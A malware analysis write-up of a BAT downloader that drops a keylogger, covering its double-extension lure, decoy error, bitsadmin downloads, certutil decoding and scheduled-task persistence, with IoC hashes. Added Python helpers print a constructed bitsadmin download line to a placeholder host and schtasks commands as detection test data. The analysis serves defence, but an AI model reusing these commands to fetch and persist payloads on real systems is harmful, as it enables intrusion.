BAT Downloader to Keylogger Technical Analysis — Part 1

Recently I’ve encountered an interesting piece of malware that used multiple techniques to obfuscate itself and drop files to disk. I thought it would be interesting to do a quick write-up/analysis of the sample and discuss some of the techniques used.

I’ll be splitting this analysis into two parts. In this first one we’ll discuss the initial attack vector and how the malware installs and obfuscates itself on the machine. The second will focus on the two PowerShell scripts that the malware drops in its second stage.

The hashes of the samples are listed in the IoCs section at the end of this post for anyone interested in taking a look.

At the time of writing the sample has only 8/60 detections on VT (VirusTotal).


The Beginning

The malware was being distributed via a Dropbox link. Once downloaded we get a zip file named “CV_YASMINA.PDF .ZIP”.

The zip file uses a double extension to trick the user into thinking it’s a PDF. This is a common technique for Windows malware, as the option to show file extensions is disabled by default.

The zip file contained one file with the “.bat” extension. Again, the bat file used the double extension technique to trick users into thinking it’s a PDF file.


Let’s extract the bat file and take a look at the code inside.


As you can see, the file seems to be obfuscated in some form and everything appears to be written in Chinese. But if we check the encoding of the file with a command-line tool like “file”, we’ll see that it’s encoded in “UTF-16 LE”.

In VSCode, for example, we can choose the option to reopen the file with a different encoding. We’ll choose “UTF-8” and voilà: the content of the malicious bat file is now readable.


Let’s start our analysis.

“CV_YASMINA.PDF .BAT” Analysis

The bat file is doing a couple of things to trick the user and download its next stage. Let’s go through the techniques used.


First the malware invokes the “Shows Desktop.lnk” file, which is used to minimize all windows and show the desktop. It’s the same as pressing the “Ctrl+M” keyboard shortcut.

It then invokes the “mshta” utility to pop up an error message written in French that translates to “Unable to read the file. The file type may not be supported, the file extension is incorrect, or the file may be corrupted.”, to trick the user into thinking that something has failed (below is the error message).


Next is the second-stage downloader section. The file checks whether a “test.bat” file already exists in the %temp% directory. If it doesn’t, it proceeds to create multiple variables named “a” through “j”, each holding a small part of the full command that’ll download the second stage. Splitting the command this way is meant to avoid detection.


If we concatenate all of these variables, we’ll get the following string.
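To read a UTF-16 LE encoded dropper and reassemble a command that was split across “set” variables like the one above, here is an added Python helper (not code from the original post). The batch content it parses is a constructed stand-in for the real dropper, and the download URL is a placeholder.

```python
"""Decode a UTF-16 LE encoded .bat dropper and reassemble a command that was
split across 'set' variables.  Added example, not code from the original post;
SAMPLE_BAT is a constructed stand-in and the URL is a placeholder."""
import re

# Constructed stand-in for the dropper's downloader section, stored as UTF-16 LE
# with a BOM, the way the real sample was.  Each variable holds a fragment.
SAMPLE_BAT = (
    'if not exist "%temp%\\test.bat" (\r\n'
    "set a=bits\r\n"
    "set b=admin /transfer j\r\n"
    "set c=ob /download /priority hi\r\n"
    "set d=gh https://EXAMPLE-PLACEHOLDER/launcher_kl.txt \r\n"
    'set e="%temp%\\WindowsNT\\cert.exe"\r\n'
    'echo %a%%b%%c%%d%%e% > "%temp%\\test.bat"\r\n'
    ")\r\n"
)
SAMPLE_BYTES = b"\xff\xfe" + SAMPLE_BAT.encode("utf-16-le")

SET_RE = re.compile(r"\s*set\s+(\w+)=(.*)", re.IGNORECASE)
VAR_RE = re.compile(r"%(\w+)%")


def decode_bat(raw: bytes) -> str:
    """Return the script text, honouring a UTF-16 BOM and falling back to UTF-8."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le")
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be")
    # BOM-less UTF-16 LE ASCII text has a NUL in (almost) every odd byte position.
    if raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def reconstruct(script: str):
    """Collect 'set name=value' fragments, then expand every line that references at
    least one of them.  Names the script never defines (e.g. %temp%) stay literal."""
    variables, commands = {}, []
    for line in script.splitlines():
        m = SET_RE.match(line)
        if m:
            variables[m.group(1).lower()] = m.group(2)
            continue
        referenced = {name.lower() for name in VAR_RE.findall(line)}
        if referenced & set(variables):
            expanded = VAR_RE.sub(
                lambda mm: variables.get(mm.group(1).lower(), mm.group(0)), line)
            commands.append(expanded.strip())
    return variables, commands
```

Running `reconstruct(decode_bat(SAMPLE_BYTES))` yields the fully reassembled bitsadmin command while leaving the `if not exist` check untouched, since it references no script-defined variable.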


The code above performs the following actions:

  • Creates a folder named “WindowsNT” in the %temp% directory.
  • Starts a download with the “bitsadmin” utility and downloads two files. The first is “launcher_kl.txt”, which gets saved as “cert.exe” in the previously created “WindowsNT” directory, and the second is “kl_exe.txt”, which gets saved as “certificate_kl.txt”, also in the “WindowsNT” directory.
  • Executes the freshly downloaded “cert.exe”.
  • Creates a scheduled task named “Update Manager” that runs every 10 minutes and launches the “cert.exe” file.

All of this is written to a file named “test.bat” that gets dropped in the %temp% directory and executed.


And just to make sure that the second-stage downloader gets executed no matter what, a scheduled task named “Update Manager” is created to execute the “test.bat” file every 10 minutes.


Assuming that everything went as planned and the malware successfully downloaded everything, the next thing that gets executed is the freshly downloaded “cert.exe”. That’s the file we’ll be looking at next.

“cert.exe” Analysis

If we first look at the result of the “file” command on our executable, we’ll see that it’s a PE32 executable with a GUI and that its symbols are stripped.


Next, let’s check if it contains any interesting strings by running the “strings” command on it.


BINGO. As you can see, the strings contain what looks like a WMI command and some PowerShell. Let’s beautify this, put it into a nice editor and start analyzing.


In a nutshell, the following code decodes the previously downloaded “certificate_kl.txt”, stored in the “WindowsNT” folder within the temp directory, using the “certutil” utility with the “-decode” flag, which decodes a base64-encoded file.


The decoded file is of type “Microsoft Cabinet archive data”, or “CAB” file for short (i.e. compressed). The next thing the malware does is the decompression routine, which consists of using the “EXPAND” command.


The newly obtained PowerShell file is the final stage (or so I thought) and contains a “Keylogger” written in C# (which I’ll be analyzing in Part 2).

The final step before executing the PowerShell script is obfuscation. The malware author created a quick obfuscation routine to change the names of some of the functions inside the script. It uses simple replace methods and some randomization to replace each function name with a set of random characters.


Finally, the script gets executed and the original encoded file “certificate_kl.txt” is deleted.


Summary

Before we conclude this first part of our analysis, let’s do a quick recap on what the malware did and what techniques were used.

  • The malware hides itself as a PDF file inside a ZIP file with the name “CV_YASMINA” to trick users into thinking that it’s a CV (Curriculum Vitae).
  • The ZIP file contains a malicious bat file that obfuscates its contents by using the UTF-16 LE encoding and multiple variable names to split up the commands being executed.
  • When executed it shows an error message to trick users into thinking that something went wrong.
  • It downloads two files (“cert.exe” and “certificate_kl.txt”) into the temp directory. Notice that the original files on Dropbox have a “.txt” extension, which adds a small layer of obfuscation, as “txt” files are sometimes ignored during log analysis.
  • It creates two scheduled tasks to make sure that the second stage gets downloaded and executed no matter what.
  • Once the second stage is downloaded, the malware proceeds to execute “cert.exe”, which decodes and creates the “final” payload.
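The chain summarised above is easier to catch as a sequence than as single events, so here is an added Python detection example (not from the original post) that runs the documented behaviours as rules over constructed process-creation events. Host names, file paths and the schtasks flags (/sc minute /mo 10) are assumptions; only the tool names, the “Update Manager” task and the 10-minute interval come from the write-up.

```python
"""Detection logic for the dropper chain described in this write-up, run over
constructed process-creation events.  Added example, not from the original post;
host names, paths and the schtasks flags (/sc minute /mo 10) are assumptions."""
import re

# (label, regex over the lower-cased command line).  Rules map to the behaviours
# documented above: BITS download into %temp%, certutil -decode, EXPAND of the
# decoded archive inside %temp%, and a scheduled task with a minute-based repeat.
TEMP = r"(\\temp\\|%temp%)"
RULES = [
    ("bits_download_to_temp", re.compile(r"bitsadmin.*/transfer.*" + TEMP)),
    ("certutil_decode", re.compile(r"certutil.*\s-decode\b")),
    ("expand_in_temp", re.compile(r"\bexpand\b.*" + TEMP)),
    ("schtasks_minute_repeat", re.compile(r"schtasks.*/create.*/sc minute.*/mo \d+")),
]

TMP = r"C:\Users\u\AppData\Local\Temp\WindowsNT"  # constructed path
# Constructed events: (host, command line).  ws01 replays the chain, ws02 is benign.
EVENTS = [
    ("ws01", f'bitsadmin /transfer job /download /priority high https://EXAMPLE-PLACEHOLDER/launcher_kl.txt "{TMP}\\cert.exe"'),
    ("ws01", f'certutil -decode "{TMP}\\certificate_kl.txt" "{TMP}\\payload.cab"'),
    ("ws01", f'expand "{TMP}\\payload.cab" -F:* "{TMP}"'),
    ("ws01", f'schtasks /create /sc minute /mo 10 /tn "Update Manager" /tr "{TMP}\\cert.exe" /f'),
    ("ws02", "certutil -hashfile C:\\Tools\\installer.msi SHA256"),
    ("ws02", 'bitsadmin /transfer patch /download https://EXAMPLE-PLACEHOLDER/patch.msi "C:\\Program Files\\App\\patch.msi"'),
]


def match_rules(cmdline: str) -> list:
    """Labels of every rule that fires on one command line."""
    text = cmdline.lower()
    return [label for label, rx in RULES if rx.search(text)]


def find_chains(events, min_stages: int = 2) -> dict:
    """Hosts on which at least min_stages distinct stages of the chain fired.
    A lone certutil -decode is noisy; several stages on one host are not."""
    seen = {}
    for host, cmdline in events:
        for label in match_rules(cmdline):
            seen.setdefault(host, set()).add(label)
    return {h: sorted(labels) for h, labels in seen.items() if len(labels) >= min_stages}
```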

Indicators of Compromise (IoCs)

  • CV_YASMINA.PDF .bat: dd42edae0008019aac47cee7962f564f1c201a232fe62f269b485e8e6332e498
  • launcher_kl.txt / cert.exe: cf7fc1e176f3931bfbb508ddeb1b24b79f3db166ff1739cff69bee4d7f5d5a6a
  • kl_exe.txt / certificate_kl.txt: 1dd960fad2a8d057d32a9889e1f6a7c1349697d7df0fee2bc08d39709c443bd4
  • windows_activator.ps1 (after obfuscation): 4a8f8f6053b1a43498c609599dfd2b491c957defede8a064194e6cf5de5c958d

Conclusion

I hope you enjoyed this quick analysis and learned something along the way. See you in part 2, hopefully very soon.

If you have any feedback or suggestions, please send them my way @nas_bench
